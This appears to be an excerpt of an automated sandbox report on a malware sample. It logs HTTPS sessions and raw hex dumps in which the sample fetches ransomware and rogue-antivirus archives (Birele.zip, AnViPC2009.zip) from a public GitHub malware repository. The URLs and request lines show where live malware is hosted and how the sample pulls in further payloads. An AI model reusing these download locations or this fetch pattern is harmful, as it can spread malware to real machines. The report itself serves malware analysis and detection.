                                                                                                                                                            2022-09-29 12:45:03 UTC10369INData Raw: 6e 49 ca d9 c6 89 d7 46 7a 1a a7 c2 0e 9b 38 e2 72 1b d1 88 5b 08 c2 22 79 a0 d4 a6 29 34 25 d1 56 08 39 f2 25 77 7c ba f8 33 45 ee c0 1e 98 89 2f 23 08 25 05 5f 7e 90 4a ad ba 7e d6 50 f6 e0 45 28 3b 04 60 4f b7 0e 18 20 d7 89 f5 d1 8a 95 27 eb 21 55 42 04 f4 fa f0 25 81 64 a5 c9 c3 c1 03 54 03 a7 67 82 68 d8 28 28 96 3c 70 a8 94 7e 7f 5b f3 60 09 2d 15 c3 5d 97 77 9d 9c bc 5a 57 b8 54 8e e7 f6 25 46 73 fe 65 a0 cf eb a1 8b e6 87 cd d3 ec 2c 5a 82 84 cd 32 d9 bb 9f 0e 6c 6f 7f 94 b5 0e 70 26 b7 48 88 ba ce d4 b0 39 95 e9 cc 80 26 94 58 7b e3 26 7a 86 bf 5b 0b e9 70 99 47 8b c6 83 96 5f 62 23 db 4a a4 a4 1f 81 a9 de 56 35 01 a5 6f 1f 15 eb 65 65 a8 7d 2d 07 ed ad 4d 06 f5 bb f4 06 e7 94 d7 a8 df 9a cc af 26 b9 57 df 72 43 ac b4 b0 23 48 04 51 a1 52 92 54
                                                                                                                                                            Data Ascii: nIFz8r["y)4%V9%w|3E/#%_~J~PE(;`O '!UB%dTgh((<p~[`-]wZWT%Fse,Z2lop&H9&X{&z[pG_b#JV5oee}-M&WrC#HQRT
                                                                                                                                                            2022-09-29 12:45:03 UTC10385INData Raw: 27 96 d6 01 e7 9c 5b a2 49 0e 0c 43 36 51 14 00 c8 f5 ab 65 b9 41 3d 7b bb 7a 90 dd ca 2e 1e 2e f6 fb 86 ac ca 64 49 30 80 13 61 9f fa 68 a2 1a 2d 90 af 99 bf b6 fc a5 59 3b ce 83 ed 1a 7d e5 95 4d e4 e9 24 95 88 3b 09 90 07 c2 59 70 7f cd ad 4c 18 10 7b d4 6a e6 a1 38 eb 9b c0 f5 59 bc 6a b3 2a 0f 55 a1 e8 93 f1 f2 df d0 47 67 55 ef 80 c6 76 f0 29 2e da 93 81 5b 76 e4 2a 60 2f 03 7d ed f7 b5 cb 9c 30 35 34 78 cb 30 98 05 c3 64 84 ba d0 df 86 50 a1 39 ff 21 bc b2 38 35 e4 cd 69 17 17 bf f1 03 a2 bf c1 69 54 a5 cb df 8e cd 2d 48 37 67 fb bd 95 b4 eb 82 83 6d 32 94 39 47 22 2b eb 49 b3 0e d9 95 e3 42 fe 32 44 69 a5 d7 99 d0 d2 e9 9c aa f3 33 48 ba 66 3a 98 49 d2 78 3e b3 72 70 5c 61 8a e7 c4 4b 13 51 41 a3 92 5b 5a 1f 2c 34 9e 3e 56 49 3c 43 62 7f a2 34 32
                                                                                                                                                            Data Ascii: '[IC6QeA={z..dI0ah-Y;}M$;YpL{j8Yj*UGgUv).[v*`/}054x0dP9!85iiT-H7gm29G"+IB2Di3Hf:Ix>rp\aKQA[Z,4>VI<Cb42
                                                                                                                                                            2022-09-29 12:45:03 UTC10401INData Raw: d8 5e f6 0b 5f 68 b5 2a 9c 58 74 64 f6 a4 65 01 27 1b 34 a7 b2 b8 4e 25 ab cc 39 91 53 f3 3b 9b 45 25 08 e6 db c2 8b 08 4b cb 6c e4 83 4a 34 84 d0 12 2d 97 5d c1 60 8d f9 98 9c 6e a3 1f 68 37 6a e2 f6 c9 03 a8 77 24 da ec 55 c0 80 e0 46 71 e9 9e 7c 5b f8 a9 4e c2 5d 00 3e ff 75 e7 82 1f 1d cd 5d 5e d3 fc ca 48 85 03 26 df 53 c9 52 59 16 b6 19 05 93 88 b6 8e c1 ec 7a b2 93 37 b9 f4 f0 00 7b 23 81 68 04 c2 63 e0 27 98 f3 a5 3d de f3 22 57 df 4b 0d 00 cb 7f 1c d1 22 d5 32 c0 80 88 3e 59 2a 3a 60 0c ba da ca a0 9d af 4d 2a c8 52 80 82 44 e6 79 fe 1a 93 76 d9 e6 8d bb de 98 28 f4 b7 fa 6b f9 89 9f f7 10 79 49 ee 28 71 68 14 e1 6e 6e 0c ff d6 35 e6 a6 42 13 26 78 2b 1a d2 05 68 0c d1 4b cc 44 f4 79 c9 0b 23 75 f0 c1 1e 6d 77 a3 7b 5c 5a 79 dd e0 f8 99 27 24 15
                                                                                                                                                            Data Ascii: ^_h*Xtde'4N%9S;E%KlJ4-]`nh7jw$UFq|[N]>u]^H&SRYz7{#hc'="WK"2>Y*:`M*RDyv(kyI(qhnn5B&x+hKDy#umw{\Zy'$
                                                                                                                                                            2022-09-29 12:45:03 UTC10417INData Raw: ea 8d 5e 67 0f 44 a5 cb 12 0d d8 b5 9f ee 62 c2 ea 20 22 5b 12 ea 96 91 da 56 40 f7 51 0e f5 2a 5d 1c ed 21 ea f6 3e 31 ac 44 8b 04 99 7c a7 44 37 ea 42 eb 5a db ab 0a b9 10 05 ba fc cb 6c dd 4b 4f 4f 89 db fd 51 c8 10 c6 5c 88 e2 a6 43 29 e7 2e 49 aa 9b 31 8a 4b 75 bc cd fd a6 1b 57 4b 0e 50 43 b7 82 f4 ad 21 5a cd a9 4d 44 6c ce 9f ae 25 f5 0c e1 db 12 73 92 6d 07 2f 8b e2 e5 f5 16 d9 28 b4 8d 2f 88 29 eb 2d 21 34 5b ee ca 9f 60 37 65 68 dc bc c6 9c f3 66 db 8f d1 f7 ed f8 b0 38 51 a4 e3 12 f0 ef d1 0e d4 2b 3a d5 7e cf 01 a7 3b 4e 2a bb 28 a3 e0 d1 0e cf 58 bc ae 83 ad fb d7 5e 95 0b 62 1a d7 17 44 e8 e6 9e 1f 68 40 cb cd ac 05 08 93 1b 78 ca 6a 67 ed 68 b1 9a fd c7 75 b1 61 8a 9e 4e 29 fd cb 9d e4 31 d6 42 70 47 0c d5 4a 3f 0e f0 bd c0 eb 76 5d b2 26
                                                                                                                                                            Data Ascii: ^gDb "[V@Q*]!>1D|D7BZlKOOQ\C).I1KuWKPC!ZMDl%sm/(/)-!4[`7ehf8Q+:~;N*(X^bDh@xjghuaN)1BpGJ?v]&
                                                                                                                                                            2022-09-29 12:45:03 UTC10433INData Raw: d0 7b 19 3e 4d 51 7b 8e eb dc 42 f6 91 ca b4 16 63 39 99 1e 1a e0 cb 2f 53 d9 5f 52 18 c8 82 ce 0c a7 5a f5 10 cf 3f e6 62 1d 57 7d d1 1b 29 63 80 09 63 72 ce d0 42 b3 0f 57 56 32 8f 70 89 e8 be 64 b6 31 5e 0b 28 78 99 07 3d 66 74 dd 0d f7 51 8d c0 b0 34 23 4f 51 9a eb d1 f8 1f 91 36 99 60 8e 0e c3 1f bc 23 f1 b8 01 d5 89 65 4b 07 16 5b 66 11 99 0c 07 39 be 0a 52 51 75 cc e5 7a 34 88 c2 ac 67 61 ed 9d ab 80 08 fd 0c f3 37 3b 39 91 ac 88 10 09 03 4e 49 86 c5 ff fe f2 48 a8 d8 4d 36 52 a4 ba e3 b9 a9 09 d2 3b ab 6b 50 b1 88 73 cc 56 21 5e 32 d5 5e 69 69 0c e6 b6 84 75 27 e6 e8 c5 0b b7 e0 8f 0a e3 19 e2 3a 1d 05 c4 08 f9 d5 9d b2 3f bc b4 f2 dd 2c 4e d9 6d 2b 95 05 47 10 67 56 23 e4 d0 4e da ed d2 e7 25 a5 63 6d a4 02 46 5f c8 5d 03 98 59 f0 19 d7 19 ff 5b
                                                                                                                                                            Data Ascii: {>MQ{Bc9/S_RZ?bW})ccrBWV2pd1^(x=ftQ4#OQ6`#eK[f9RQuz4ga7;9NIHM6R;kPsV!^2^iiu':?,Nm+GgV#N%cmF_]Y[
                                                                                                                                                            2022-09-29 12:45:03 UTC10449INData Raw: 89 10 70 b2 8b 7d b0 b3 9f c2 f6 06 9f cd 57 b9 9b 5e 62 0d 01 7d b2 82 77 b8 9e 22 0a 6f 81 7c e9 b4 15 c4 05 6e a3 60 f0 01 67 59 ff 51 46 78 e1 b5 52 a5 26 c1 e0 97 69 e8 1f c0 58 62 6e 62 6f d4 e9 e3 12 34 b2 a3 5a bb 3f f8 47 57 37 27 8a 94 26 3c 2a 68 aa f3 56 e3 93 1d 9d 16 ba 71 7f 61 54 8c a2 d3 f6 11 e0 57 df b3 e6 c6 5e c5 5e db 1d c0 ce 29 8f 24 0b a8 05 7f aa 44 73 8a 12 70 75 eb 61 35 dd dd 54 60 e3 bd b9 63 33 71 da fc cf c0 10 aa 3f 10 27 7e 20 9d 00 04 13 6f c5 87 1f 2e de d2 1c 11 db 65 75 3a 27 24 ac 63 09 19 21 45 70 24 56 1f 81 fa 2a 23 0c ed 3a e3 45 76 21 97 2c c7 24 c4 34 33 d1 d1 ac 5f 99 2c b8 17 27 96 b5 68 3f f7 f2 e3 d2 d7 3e 93 16 27 f7 f6 08 b8 29 96 0c 42 5f f5 3c 00 16 aa 96 59 01 31 1b 05 c6 69 e8 48 c0 a0 a7 90 d2 e8 b4
                                                                                                                                                            Data Ascii: p}W^b}w"o|n`gYQFxR&iXbnbo4Z?GW7'&<*hVqaTW^^)$Dspua5T`c3q?'~ o.eu:'$c!Ep$V*#:Ev!,$43_,'h?>')B_<Y1iH
                                                                                                                                                            2022-09-29 12:45:03 UTC10465INData Raw: 93 34 11 f9 60 30 7c 9d 9f 30 b0 8e 31 c7 83 3f 2a 03 61 d6 5d e7 57 f7 c0 ef d6 fe 6a f7 b9 5b 96 d2 b7 45 ab ab d6 f8 5a 76 9d 6b ce 09 4b f3 69 c1 3f e2 a1 a9 57 aa a7 f5 86 14 d3 6d 7a 9b ce 81 01 cc ae 91 69 d6 a8 a9 ef 75 c3 4d 07 49 55 ba f8 e0 aa 4e d1 d2 e8 e2 dd 6c 09 e2 0a 73 63 ee 5b 18 3b 3f e5 04 1a dc af 67 32 74 d0 0d 9c 18 75 b4 53 eb 05 59 fb 3a 81 eb 55 58 84 8a 4d e3 3e 07 f7 f8 b3 d2 ec f5 e6 87 09 68 cf 2c 76 2c 1d 74 dd 34 5e d5 c9 1b 6e a2 92 08 79 b3 57 4d b5 4e 02 bf b8 cb 0a 0a bb c3 d1 91 82 99 43 f5 02 df 17 a2 8b 88 73 19 87 bd e9 fb 46 04 e6 74 f8 18 35 61 bc e1 34 71 39 73 b2 0a 39 1c 31 c1 30 10 9a f9 c4 ff b8 f3 bd 1f 49 c0 b2 84 aa e0 44 22 53 bd ac 2d 74 b5 8a e3 c8 38 3b d9 cd 55 ca c2 0f 3b 0a 45 b3 44 0e 48 23 e3 04
                                                                                                                                                            Data Ascii: 4`0|01?*a]Wj[EZvkKi?WmziuMIUNlsc[;?g2tuSY:UXM>h,v,t4^nyWMNCsFt5a4q9s910ID"S-t8;U;EDH#
                                                                                                                                                            2022-09-29 12:45:03 UTC10481INData Raw: 1f 30 d1 42 d2 52 7b bc bd 5c 09 12 b4 42 e4 d5 79 d1 23 f3 46 4b 53 8a d6 89 f0 18 af da 8c b0 2a 33 ad 33 c0 ea 36 0d 1a 61 e1 0b 76 46 9b 4a 13 55 82 a2 d5 7a a1 4d ff 4a 13 d4 a9 43 45 64 e4 0d 78 46 9d 62 44 85 e5 e6 3f 07 3f 0a 24 2f 93 2e fd 0d 68 76 2a 94 62 e3 59 6b 70 c9 57 3f 30 03 16 1b 44 27 a2 58 45 48 e1 d2 16 e0 e5 72 ba 28 cb 85 d5 eb e7 30 e0 f4 f1 e1 2f a4 83 ba fa 72 32 a5 be b2 67 1e e2 d1 3a 69 cb 7b d3 ff 03 2c 6f ef 41 37 86 98 f6 0e f4 a6 63 ee 61 9e 15 9f 53 71 d1 d6 cc 43 46 89 40 d4 24 72 50 a3 bf cf 84 67 3f 60 c9 5f 99 40 08 2c ef c8 85 7f 1b dc 05 91 34 09 3b 10 84 8e 8a bd 08 b6 c5 f6 3a 8a 32 bd fa af a6 5e d2 89 48 20 17 35 65 e8 c3 00 2a 73 c9 e0 cc ed e6 16 11 3a b0 11 54 f8 dd 86 f4 cb 50 bf fc c3 4a 84 94 75 af fd 69
                                                                                                                                                            Data Ascii: 0BR{\By#FKS*336avFJUzMJCEdxFbD??$/.hv*bYkpW?0D'XEHr(0/r2g:i{,oA7caSqCF@$rPg?`_@,4;:2^H 5e*s:TPJui


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            7140.82.121.4443192.168.2.649711C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:46 UTC398INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:43:24 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Birele.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:44:46 UTC398INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            70192.168.2.649743140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:04 UTC10482OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            71140.82.121.4443192.168.2.649743C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:04 UTC10482INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:22 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:04 UTC10482INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            72192.168.2.649744185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:04 UTC10484OUTGET /Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            73185.199.110.133443192.168.2.649744C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:04 UTC10484INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 1178406
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "4b7f39242bdc3c2d1323de2cf6529b8807eb1cfe6f7dc4241f8df746b2145355"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 0866:67BD:BA80D:1793D0:6335928F
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:04 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6962-MXP
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1664455504.248583,VS0,VE2
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: c82dfadf6689e32c7aa5d4c4ee7da2b6e3370c3e
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:04 GMT
                                                                                                                                                            Source-Age: 193
                                                                                                                                                            2022-09-29 12:45:04 UTC10485INData Raw: 50 4b 03 04 33 00 01 00 63 00 c3 5c f5 3c 00 00 00 00 58 fa 11 00 5a bb 12 00 19 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 56 69 50 43 32 30 30 39 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 18 1e 19 ad d3 ff 2d 34 78 35 ff b8 e5 42 12 9c 05 07 97 5d 8c 1a 3c eb c6 99 7d 87 2f 61 b9 e2 28 ee 82 71 5c ce 7b 7c 30 98 9b eb 94 90 c9 3c 15 7b b7 9c ba 5f ff 0a 3a ba bb f0 04 ba 43 3a ee c9 99 f4 b2 d8 3c 52 0e eb 5c 5d b2 e2 78 a5 65 02 53 2a 04 41 4d 0f 32 09 f9 96 bf d5 21 02 00 db 0f 54 dd fd 79 94 e9 75 e8 be e9 32 91 5f 70 01 4e 0b b8 02 bb c3 53 72 9f ea f9 c2 8c 2f 31 b8 0f 6f 9e 32 7f 96 1e 1d 26 00 13 55 a5 44 92 af a0 7a 25 bb ba 49 a6 1f 52 6e 15 0e 72 dd 98 30 df ba c9 10 ed e7 c7 80 d6 00 cf 6d e4 2c 60 84 51 9a 88 a2 aa d4 0c dd 3c eb db
                                                                                                                                                            Data Ascii: PK3c\<XZEndermanch@AnViPC2009.exeAE-4x5B]<}/a(q\{|0<{_:C:<R\]xeS*AM2!Tyu2_pNSr/1o2&UDz%IRnr0m,`Q<
                                                                                                                                                            2022-09-29 12:45:04 UTC10486INData Raw: f0 89 95 f9 82 16 4d 9f bc c0 c4 30 d2 18 2b 95 f7 c3 87 5c ec 63 db 65 52 73 c4 32 83 3a 07 d7 99 f3 32 e1 8f 52 02 16 a8 ad 95 19 72 b9 2f d6 2b 3a fd ec ce 99 d5 e7 be 78 09 d5 08 31 ce 3c 2b fb 48 65 13 32 23 4a b0 2b 7c ca 5f 70 6d 2f 1a af 52 17 f6 f2 61 fc 1d a6 9b 78 de 94 a1 e8 f9 ad 49 b3 30 2f 9e e4 12 5c b1 a9 26 a8 45 dc 7c c9 02 7a 32 c5 f5 95 d0 d0 7b fe 0c 0d 23 ee bd 71 20 1c 8b 68 5d a1 ce 07 fa 07 6b 00 c7 5e 7f 30 aa bd c1 5a 14 f3 25 1f 16 3e 74 27 fb 06 d0 80 52 ed e6 39 4a 9c 87 25 49 5a c5 5b 26 b8 4b d6 d4 29 c2 56 81 e8 94 e7 64 c3 f7 0e 69 db 9a ec 51 77 ba ea d2 2a 14 40 c8 c2 2f d9 64 15 d6 57 34 66 40 5b 20 e0 40 43 55 e4 27 25 c2 d5 61 03 db 15 e3 3b d4 64 49 bf 9a d1 84 a9 e8 6f 17 82 43 ad 17 4e c5 37 ac 78 04 a6 64 fd 07
                                                                                                                                                            Data Ascii: M0+\ceRs2:2Rr/+:x1<+He2#J+|_pm/RaxI0/\&E|z2{#q h]k^0Z%>t'R9J%IZ[&K)VdiQw*@/dW4f@[ @CU'%a;dIoCN7xd
                                                                                                                                                            2022-09-29 12:45:04 UTC10488INData Raw: 68 81 6a cd b0 eb 9a 8d 7f 24 a9 1c 87 f3 dd 52 f2 64 7d 9e 45 9d da 90 19 e2 2d 1c 7b 26 df 0c f0 b6 0b 93 87 34 b5 ee 6b 42 2f e0 42 81 48 f9 4c a1 06 8e 15 db d1 4b 4b 54 0e 7e 56 68 a0 ac dc 20 16 49 32 1c 3e c2 5e b0 cb 9c 01 61 bf 15 fe 84 1a 93 9b ef 26 c0 39 6b 84 7d ba d2 d8 0c ba 26 58 a4 77 fa 4f ca c9 b1 f3 4c 4f 5c 6d 2e 91 c5 a9 84 46 bf 00 97 c1 fa 82 9a 1d 54 57 ef 6c 93 0b ec 3d fd d7 d5 8a 99 f2 33 50 16 ef 9e 80 ed 5e d6 b6 23 f0 90 5d 08 13 38 54 8e 91 8e e6 ed 2f 88 93 bc 27 31 dc ff 51 5a a7 99 1b e2 06 66 d9 0e 4c 70 6a e2 06 f3 1d 6c f2 c7 5a e9 ae a3 9d 70 3c 73 c7 ec 25 b6 90 f2 11 0b e8 26 7c 7a e9 f4 cb c5 1e df 9a 76 5d 4c 65 00 b7 a7 9b 7a a1 e8 3c 09 ff a9 b5 89 93 ee fd b1 8b 9b c8 ad a3 b5 0c 70 82 51 f5 f5 2b f5 40 0c f6
                                                                                                                                                            Data Ascii: hj$Rd}E-{&4kB/BHLKKT~Vh I2>^a&9k}&XwOLO\m.FTWl=3P^#]8T/'1QZfLpjlZp<s%&|zv]Lez<pQ+@
                                                                                                                                                            2022-09-29 12:45:04 UTC10489INData Raw: 89 4c b0 e0 7d a9 1e 3c f2 11 50 95 69 af 11 35 3f 8c 13 48 1d 2b e3 c1 ce 2f 6f d4 78 46 5e ba 26 71 6d 91 b6 4a 28 a4 40 42 37 0c 09 ef 1d 5f ba 8a 7c da d1 be 33 d8 af ad 54 29 8a dd f2 58 93 86 12 f5 16 d1 c1 eb 29 18 2c 5c 00 94 1f a2 ec 0e 6f 45 91 a0 5c ca 36 d4 9a d9 17 1a 6e 85 42 5a 0b 3b 7c 97 2d 9f 8e 8a d4 ce 3f 91 f2 18 28 1d d6 fa ff d3 1a 60 29 0b 1c b7 bb f4 64 79 39 9c c9 ab f5 3e 6e 95 82 a6 ed b2 27 fb bc e1 a1 e8 47 44 1e aa 45 3d d1 49 52 38 22 9f 36 60 2c 23 b8 7d 43 63 04 bb 92 26 ff 8d d9 cc 95 27 55 c2 53 7f f7 0b fd 6b 13 b9 4b 50 ed 8d 9b 1f 7d ca 39 90 00 4e 9f c4 f6 2a c3 4f 78 73 0b 56 82 4f f8 41 37 af 22 b7 a8 fb 83 d1 41 4b 87 fa 20 26 2f 6b 20 ef 4e d3 c1 db fe d7 50 df 31 24 f6 44 a2 c7 b4 5a cb 36 28 d3 46 c1 64 f9 f7
                                                                                                                                                            Data Ascii: L}<Pi5?H+/oxF^&qmJ(@B7_|3T)X),\oE\6nBZ;|-?(`)dy9>n'GDE=IR8"6`,#}Cc&'USkKP}9N*OxsVOA7"AK &/k NP1$DZ6(Fd
                                                                                                                                                            2022-09-29 12:45:04 UTC10490INData Raw: 75 67 f7 df ce 69 be 17 7d 81 ee d1 54 1c e1 92 e7 e8 da 54 1a 42 cc 2a e0 f1 8d f5 a0 86 5a 2f 9c 05 d1 f4 52 19 ac a3 97 9e 66 88 1f 10 8e 37 da 1d 44 07 35 7d 42 cb 86 c3 96 37 ed 54 bc 51 0a 36 ae f1 55 08 6d 71 be 95 ac c1 bb 90 aa 62 9a 0b 60 45 ba e2 c4 77 ae f6 e1 f6 34 0f 12 d3 73 37 ad aa 16 9c 45 4d 7d 54 87 2a 75 2f 81 a7 02 b1 ce db 94 8c 59 83 04 38 57 ef e9 19 48 63 5e d5 80 ae 13 90 2e 5d dd c9 fb a8 14 d7 e8 72 b1 62 f0 b9 bf 84 ad 73 45 45 f8 ff f9 bc af a9 77 a0 bb f2 55 10 4a d9 7f f5 d9 17 56 2d dc 76 ff f5 88 76 29 55 35 4e 47 ab 70 6f 11 cb 2e ea c5 88 8e 7f 2b 08 a3 7f 37 9d ac af 05 88 ee be c9 04 0e c3 b2 16 0b af 9d 83 b3 85 f1 0b 24 ed cf aa 54 47 35 d8 60 d5 19 3b bf 99 01 cc 61 43 5a c4 84 d4 7e 8f 6e c4 0a 94 ba 9a f7 92 2e
                                                                                                                                                            Data Ascii: ugi}TTB*Z/Rf7D5}B7TQ6Umqb`Ew4s7EM}T*u/Y8WHc^.]rbsEEwUJV-vv)U5NGpo.+7$TG5`;aCZ~n.
                                                                                                                                                            2022-09-29 12:45:04 UTC10492INData Raw: 8f e8 8a ba 8a 7a 1e 97 1a d5 b6 e0 89 63 9e 05 b1 db 17 24 85 ee d3 69 b0 9e de 01 8e ce d1 26 fc 76 76 05 3e be a0 34 f2 ac 16 f9 24 6d a3 89 14 a5 e4 ac 75 8d d0 77 39 bb 48 36 81 0b c5 18 b7 d3 45 da 68 6e cb 48 d2 be 59 b0 a9 0b d6 84 60 92 d5 0f 62 3f 69 06 46 c1 4b 0c 14 c2 79 70 04 49 9f c9 ed c0 3c 7e f4 d9 c7 3e bc fa e9 22 35 5a 56 cf a3 83 bb 3e ad 38 e9 2e c9 63 d9 2e a7 db 9b 7c 4a ac c8 de 15 0d b8 87 88 97 74 8b 20 7c 72 67 71 bb 55 8e 7e ae 8d aa 17 31 a9 51 37 3a 7b 84 fc b5 ce e1 fe e4 cd d6 62 be 9f c5 be da 96 d0 11 bf d0 72 f4 2c 99 46 e3 b0 ed 0a 2f cb 9a b3 2f 92 17 12 95 cd 2e 8f 2a f7 76 ab b5 05 b6 d4 22 55 a7 d8 cf f5 68 70 73 8d bb 9b bf e2 9e 6f e8 32 c6 49 d0 1e ae 98 15 cd 0a 45 06 cc 11 ae a9 56 9b 7e 01 7d 10 36 7f b1 ec
                                                                                                                                                            Data Ascii: zc$i&vv>4$muw9H6EhnHY`b?iFKypI<~>"5ZV>8.c.|Jt |rgqU~1Q7:{br,F//.*v"Uhpso2IEV~}6
